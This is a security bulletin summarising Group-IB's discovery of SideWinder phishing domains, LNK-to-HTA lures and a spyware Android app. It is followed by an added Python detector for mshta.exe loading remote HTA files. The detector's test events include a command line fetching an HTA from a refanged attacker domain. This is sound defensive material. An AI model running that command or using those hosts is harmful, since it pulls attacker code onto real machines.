State-Sponsored Sidewinder Hacker Group's Covert Attack Infrastructure Uncovered
Cyber Security Threat Summary:
Group-IB recently uncovered a previously undocumented attack infrastructure used by SideWinder, a prolific state-sponsored group, to target entities located in Pakistan and China. The infrastructure unearthed encompasses 55 domains and IP addresses, which researchers identified as phishing domains mimicking organizations in the news, government, telecommunications, and financial sectors.
“The newly discovered domains mimic government organizations in Pakistan, China, and India and are characterized by the use of the same values in WHOIS records and similar registration information. Hosted on some of these domains are government-themed lure documents that are designed to download an unknown next-stage payload. A majority of these documents were uploaded to VirusTotal in March 2023 from Pakistan. One among them is a Microsoft Word file purportedly from the Pakistan Navy War College (PNWC), which was analyzed by both QiAnXin and BlackBerry in recent months. Also uncovered is a Windows shortcut (LNK) file that was uploaded to VirusTotal from Beijing in late November 2022. The LNK file, for its part, is engineered to run an HTML application (HTA) file retrieved from a remote server that spoofs Tsinghua University's email system (mailtsinghua.sinacn[.]co). Another LNK file that was uploaded to VirusTotal around the same time from Kathmandu employs a similar method to fetch an HTA file from a domain masquerading as a Nepalese government website (mailv.mofs-gov[.]org)” (The Hacker News, 2023).
Security Officer Comments:
SideWinder has been in operation since at least 2012. According to researchers, the group leverages spear-phishing emails as its initial attack vector. Based on previous campaigns, the group mainly targets entities in Pakistan, China, Sri Lanka, Afghanistan, Bangladesh, Myanmar, the Philippines, Qatar, and Singapore. SideWinder’s main motive or objective appears to be cyber espionage. For instance, Group-IB uncovered a malicious Android file that was also uploaded to VirusTotal from Sri Lanka in March 2023. Taking a closer look, the researchers noted that the Android app masquerades as a “Ludo Game” and prompts users to grant the app access to device contacts, location, logs, messages, calendar, and more. With such access, the actors are able to spy on unsuspecting victims and steal sensitive information.
Suggested Correction(s):
With spear-phishing being the initial infection vector, users should adhere to the following recommendations:
Report phishing emails to the appropriate security or I.T. staff immediately
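The summary above describes LNK files that launch mshta.exe to pull an HTA from a spoofed domain. The following is an added detection example (not from the page, Group-IB, or The Hacker News) that triages constructed process-creation events for mshta.exe fetching a remote HTA and raises the severity when the host matches one of the two defanged domains quoted above; the event field names and the sample events are assumptions.

```python
import re
from urllib.parse import urlparse

# Defanged hosts quoted in the threat summary, refanged for matching.
PAGE_IOC_HOSTS = {h.replace("[.]", ".")
                  for h in ("mailtsinghua.sinacn[.]co", "mailv.mofs-gov[.]org")}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation events (not real telemetry); field names are an
# assumption loosely modelled on Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://mailtsinghua.sinacn.co/Advisory.hta"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\setup.hta"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/x.hta"},
    {"image": r"C:\Program Files\App\app.exe",
     "cmdline": "app.exe --update https://example.invalid"},
]


def remote_hosts(cmdline):
    """Hostnames of every http(s) URL present in a command line."""
    hosts = (urlparse(u).hostname for u in URL_RE.findall(cmdline))
    return [h for h in hosts if h]


def classify(event):
    """Return a finding dict for mshta.exe loading a remote HTA, else None."""
    if not event["image"].lower().endswith("\\mshta.exe"):
        return None
    hosts = remote_hosts(event["cmdline"])
    if not hosts:
        return None  # local HTA: not the remote-fetch pattern described above
    known = sorted(h for h in hosts if h.lower() in PAGE_IOC_HOSTS)
    return {"cmdline": event["cmdline"], "hosts": hosts,
            "known_iocs": known, "severity": "high" if known else "medium"}


def triage(events):
    """Run classify() over a batch and keep only the events that fire."""
    return [f for f in (classify(e) for e in events) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["severity"], finding["hosts"], finding["known_iocs"])
```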
IOCs: https://www.group-ib.com/blog/hunting-sidewinder/
Link(s):
https://thehackernews.com/2023/05/state-sponsored-sidewinder-hacker.html